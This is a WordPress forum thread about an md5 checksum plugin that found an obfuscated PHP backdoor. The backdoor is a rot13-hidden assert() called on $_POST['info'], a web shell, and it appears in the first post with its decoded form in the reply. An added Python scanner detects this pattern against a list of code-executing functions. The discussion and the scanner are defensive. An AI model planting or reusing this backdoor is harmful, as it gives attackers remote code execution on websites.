• hello –

    i found this plugin that checks md5 values against the WP repository, which i believe is an excellent idea.

    any other opinions on taking this approach to security (in addition to quttera)?

    this plugin found the following in two places, ms-admin.php and ms-sites.php

    <?php
    $license = str_rot13('n'.'f'.'f'.'r'.'e'.'g');
    $license($_POST['info']);
    ?><?php
Viewing 2 replies - 1 through 2 (of 2 total)
  • Curious.
    I suspect that this is an EXTREME security vulnerability. With a vulnerability like this accessible, I suspect that no one would bother with an SQL injection.

    Rot13 is a trivial text obscurer. Your code amounts to:

    <?php
    assert($_POST['info']);
    ?><?php

    Now this will evaluate whatever expression is passed in as $_POST['info'].
    This is looking very suspect.
    Where are these files ms-admin.php and ms-sites.php coming from?

    Thread Starter edwardsmark

    (@edwardsmark)

    not sure where the files came from, but i am now running a bash script that searches this out, and runs frequently.

    i am impressed the md5 plugin managed to find it.
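
An added example, not part of the thread and not code from the plugin or the bash script mentioned in it: a small Python scanner that statically undoes the str_rot13 wrapping shown in the first post and reports variables that decode to a code-executing PHP function, noting whether they are then called on request input. The function list, all names, and the second half of the sample are assumptions made for illustration.

```python
import codecs
import re

# Callable PHP functions that run code or commands (illustrative list, an assumption).
# assert() evaluates a string argument as PHP code on PHP versions before 8.0.
DANGEROUS = {"assert", "system", "exec", "passthru", "shell_exec",
             "popen", "proc_open", "create_function"}

# $var = str_rot13( 'a' . "b" . 'c' ... )
ASSIGN = re.compile(
    r"""(\$\w+)\s*=\s*str_rot13\s*\(\s*((?:(?:'[^']*'|"[^"]*")\s*\.?\s*)+)\)""",
    re.I)
LITERAL = re.compile(r"'([^']*)'|\"([^\"]*)\"")
REQUEST_ARG = r"\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"


def fold_literals(expr):
    """Join PHP string literals concatenated with '.', e.g. 'n'.'f' -> nf."""
    return "".join(a or b for a, b in LITERAL.findall(expr))


def scan_php(source):
    """Return (line, variable, decoded_name, called_on_request_input) tuples."""
    findings = []
    for m in ASSIGN.finditer(source):
        var = m.group(1)
        decoded = codecs.decode(fold_literals(m.group(2)), "rot_13").lower()
        if decoded not in DANGEROUS:
            continue  # rot13 of something harmless, e.g. a display string
        called = re.search(re.escape(var) + REQUEST_ARG, source) is not None
        line = source.count("\n", 0, m.start()) + 1
        findings.append((line, var, decoded, called))
    return findings


# First block is the snippet from the thread; the rest is constructed.
SAMPLE = """<?php
$license = str_rot13('n'.'f'.'f'.'r'.'e'.'g');
$license($_POST['info']);
?><?php
$greeting = str_rot13('uryyb');  // constructed benign use of str_rot13
echo $greeting;
"""

if __name__ == "__main__":
    for line, var, name, called in scan_php(SAMPLE):
        print(f"line {line}: {var} decodes to {name}(), request input passed: {called}")
```

A pattern scan like this only catches the wrapping it was written for, so it complements the checksum comparison against the repository rather than replacing it.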


The topic ‘md5 checksum checker’ is closed to new replies.